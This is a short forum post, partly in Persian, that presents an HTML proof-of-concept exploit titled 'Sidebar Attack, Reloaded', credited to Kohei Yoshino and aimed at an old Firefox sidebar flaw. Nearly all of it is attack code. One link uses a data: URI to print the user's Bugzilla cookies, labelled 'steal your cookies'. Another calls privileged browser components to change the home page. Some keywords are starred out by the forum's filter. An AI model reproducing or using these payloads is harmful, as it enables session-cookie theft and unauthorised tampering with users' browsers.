کد PHP:
Exploit:
// Exploit by Kohei Yoshino
< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
< html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
< head>
< meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
< title>Sidebar Attack, Reloaded< /title>
< /head>
< body>
< p>1. < a href="#" target="_search" onclick="location.href = 'https://bugzilla.mozilla.org/';">Click here to < strong>open this page into sidebar< /strong>.< /a>< /p>
< p>2. < a href="data:text/html,< ******>document.write(document.****ie);< /******>">Click here to < strong>steal your ****ies< /strong> on Bugzilla.< /a>< /p>
< p>3. Then, open about:config in content area.< /p>
< p>4. < a href="data:text/html,< ******>Components.classes['@mozilla.org/preferences-service;1'].getService( Components.interfaces.nsIPrefBranch ).setCharPref('browser.startup.homepage', 'http://www.mozdev.org/');< /******>">Click here to < strong>change your home page to mozdev.org< /strong>.< /a>< /p>
< /body>
< /html>